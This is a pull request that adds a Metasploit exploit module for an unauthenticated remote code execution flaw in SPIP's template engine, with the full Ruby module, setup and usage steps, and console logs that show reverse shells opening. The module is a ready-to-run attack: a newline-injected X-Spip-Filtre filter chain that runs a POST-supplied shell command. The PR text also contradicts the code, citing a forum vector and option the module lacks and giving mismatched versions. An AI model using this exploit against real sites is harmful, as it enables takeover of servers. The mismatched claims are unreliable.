### PR TITLE
Add SPIP X-Spip-Filtre unauthenticated RCE module

### DIFF
--- a/documentation/modules/exploit/multi/http/spip_x_spip_filtre_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_x_spip_filtre_rce.md
@@ -1,0 +1,64 @@
+## Vulnerable Application
+
+This module exploits a PHP function-call injection in SPIP's template
+engine. The `analyse_resultat_skel()` function extracts
+`<?php header("X-Spip-Filtre: ..."); ?>` patterns from the rendered page
+body and calls the listed functions as template filters.
+
+A newline character is injected into a GET parameter value, placing a
+`header()` call directly inside the compiled PHP template. The filter
+chain `intval|_request|system` is used: `intval` reduces the page body to
+the string `"0"`, then SPIP's `_request` function reads the POST parameter
+named `0` (which contains the shell command), and finally `system` executes
+it.
+
+Affected versions: SPIP 4.4.20 (fixed in 4.4.21)
+
+### Setup
+
+```bash
+wget https://files.spip.net/spip/archives/spip-v4.4.20.zip
+mkdir spip && mv spip-v4.4.20.zip spip
+cd spip && unzip spip-v4.4.20.zip
+php -S 0.0.0.0:8000
+```
+
+Navigate to `http://localhost:8000/ecrire` to complete the installation.
+
+## Verification Steps
+
+1. Set up a SPIP instance using the commands provided above.
+2. Start msfconsole.
+3. Do: `use exploit/multi/http/spip_x_spip_filtre_rce`
+4. Do: `set RHOSTS <target>`
+5. Do: `check`
+6. Verify the target is reported as vulnerable.
+7. Do: `run`
+8. You should get a shell.
+
+## Options
+
+No module-specific options beyond the standard `RHOSTS`, `RPORT`, and
+`TARGETURI`.
+
+## Scenarios
+
+```
+msf exploit(multi/http/spip_x_spip_filtre_rce) > run
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse SSL handler on 127.0.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.4.20
+[+] The target is vulnerable. X-Spip-Filtre invoked phpinfo() on the rendered page
+[*] Sending exploit via newline injection (intval|_request|system)...
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:50102) at 2026-08-20 16:01:00 +0200
+
+
+id -nu
+jvoisin
+^C
+Abort session 1? [y/N]  y
+
+[*] 127.0.0.1 - Command shell session 1 closed.  Reason: User exit
+msf exploit(multi/http/spip_x_spip_filtre_rce) >
+```

--- a/modules/exploits/multi/http/spip_x_spip_filtre_rce.rb
+++ b/modules/exploits/multi/http/spip_x_spip_filtre_rce.rb
@@ -1,0 +1,102 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Spip
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SPIP X-Spip-Filtre Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits a PHP function-call injection in SPIP's
+          template engine. The analyse_resultat_skel() function extracts
+          <?php header("X-Spip-Filtre: ..."); ?> patterns from the rendered
+          page body and calls the listed functions as template filters.
+
+          A newline character is injected into a GET parameter value, which
+          places a header() call on its own line inside the compiled PHP
+          template. The filter chain intval|_request|system reads a shell
+          command from a POST parameter and executes it.
+        },
+        'Author' => [
+          'Julien Voisin' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-4-21.html'],
+          ['CVE', '2026-77647']
+        ],
+        'Targets' => [
+          [
+            'Automatic',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ]
+        ],
+        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_php_ssl' },
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2026-08-20',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    rversion = spip_version || spip_plugin_version('spip')
+    return CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion
+
+    print_status("SPIP Version detected: #{rversion}")
+
+    injection = "\nheader(\"X-Spip-Filtre: intval|phpinfo\");\n"
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'spip.php'),
+      'vars_get' => { Rex::Text.rand_text_alpha(6) => injection }
+    )
+    return CheckCode::Unknown('Target did not respond') unless res
+
+    phpinfo_markers = ['PHP Version', 'PHP Extension', 'phpinfo()']
+    matches = phpinfo_markers.count { |m| res.body&.include?(m) }
+
+    unless matches >= 2
+      return CheckCode::Safe('Filter execution was not observed')
+    end
+
+    if res.body =~ /disable_functions.*?<td[^>]*>([^<]+)/mi
+      disabled = ::Regexp.last_match(1).strip
+      print_warning("disable_functions: #{disabled}") unless disabled.empty?
+    end
+
+    CheckCode::Vulnerable('X-Spip-Filtre invoked phpinfo() on the rendered page')
+  end
+
+  def exploit
+    injection = "\nheader(\"X-Spip-Filtre:intval|_request|system\");\n"
+
+    print_status('Sending exploit via newline injection (intval|_request|system)...')
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'spip.php'),
+        'vars_get' => { Rex::Text.rand_text_alpha(4) => injection },
+        'vars_post' => { '0' => payload.encoded }
+      }
+    )
+  end
+end


### PR DESCRIPTION
## Description

Exploit a PHP function-call injection in SPIP's forum preview. User-controlled text in the forum texte field reaches the compiled template body, where analyse_resultat_skel() extracts <?php header("X-Spip-Filtre: ...") ?> patterns and calls the listed functions as filters. The chain intval|_request|system converts the body to "0", reads POST parameter "0" containing the shell command, and executes it.

Tested against SPIP 4.4.19.

## Breaking Changes

<!-- Does this PR change existing behavior, remove options, rename datastore settings, or alter API/mixin interfaces? If yes, describe what breaks and how users should adapt. Write "None" if not applicable. -->

None

## Reviewer Notes

<!-- (Optional) Guide the reviewer: where to start reading, what the key change is, what's intentionally left out or deferred. Delete this section if not needed. -->

## Verification Steps

<!-- Provide specific, numbered steps a reviewer can follow to verify this change works as intended. At least one step must describe the expected observable outcome. Generic steps such as "verify it works" will result in the PR being closed. -->

1. - [x] Download Spip via `wget https://files.spip.net/spip/archives/spip-v4.4.19.zip`
2. - [x] Run `php -S 127.0.0.1:8080`
3. - [x] Open `http://127.0.0.1:8080/ecrire` to install Spip, feel free to use sqlite as backend
4. - [x] `use multi/http/spip_x_spip_filtre_rce`
5. - [x] `set RHOST 127.0.0.1`
5. - [x] `set LHOST 127.0.0.1`
5. - [x] `set RPORT 8080`
6. - [x] `run`, and get a shell



## Test Evidence

```
msf exploit(multi/http/spip_x_spip_filtre_rce) > run
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.4.19
[+] The target is vulnerable. X-Spip-Filtre invoked phpinfo() on the rendered page
[*] Sending exploit via GET parameter injection (intval|_request|system)...
[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:42382) at 2026-08-17 13:48:16 +0200

id -nu
jvoisin
^C
Abort session 4? [y/N]  y

[*] 127.0.0.1 - Command shell session 4 closed.  Reason: User exit
msf exploit(multi/http/spip_x_spip_filtre_rce) > set method FORUM 
method => FORUM
msf exploit(multi/http/spip_x_spip_filtre_rce) > run
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.4.19
[+] The target is vulnerable. X-Spip-Filtre invoked phpinfo() on the rendered page
[*] Sending exploit via forum POST (intval|_request|system)...
[*] Command shell session 5 opened (127.0.0.1:4444 -> 127.0.0.1:49322) at 2026-08-17 13:48:36 +0200

id -nu
jvoisin
^Z
Background session 5? [y/N]  y
msf exploit(multi/http/spip_x_spip_filtre_rce) > 
```

## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Fedora<!-- e.g., Ubuntu 22.04, Windows 11, macOS 14.2 --> |
| **Target Software/Hardware** | Spip 4.4.19<!-- Name and version of the software or hardware targeted by this change --> |
| **Docker Image / Vagrant Setup** | <!-- (Optional) Image name or setup instructions if applicable, otherwise remove this row --> |

## AI Usage Disclosure

<!-- Was AI used in the creation of this PR? If so, describe what tools were used and how (e.g., code generation, documentation drafting, test writing). Write "None" if no AI tools were used. -->

None



## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [ ] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)

<!-- After the PR has been submitted, check on the GitHub Actions status and review the job for any failures (red-X marks). Resolve these issues as they will be flagged by review. -->

<details>
<summary>Hardware and Complex Software Module Guidance</summary>

If your module targets specialized hardware (routers, IoT, PLCs, etc.) or complex software (licensed, multi-service, or multi-version), provide a pcap, screen recording, or video showing successful execution.

Email sanitized pcaps/recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com) — remove real IPs, credentials, and hostnames before sending. If hardware/software is unavailable, explain in the PR description.

</details>

<details>
<summary>Responsiveness and PR Takeover Policy</summary>

We want every contribution to make it into the project. If approximately 2 weeks pass after a review request without a comment or code update from you, the team may take over the PR and complete the work on your behalf.

If this happens, you will remain credited as a co-author on the final commit — your contribution is always recognized.

This policy exists to keep the project moving forward. It is not a reflection on the quality of your work or your involvement. Life happens, and we would rather finish the work together than let a good contribution go stale.

</details>
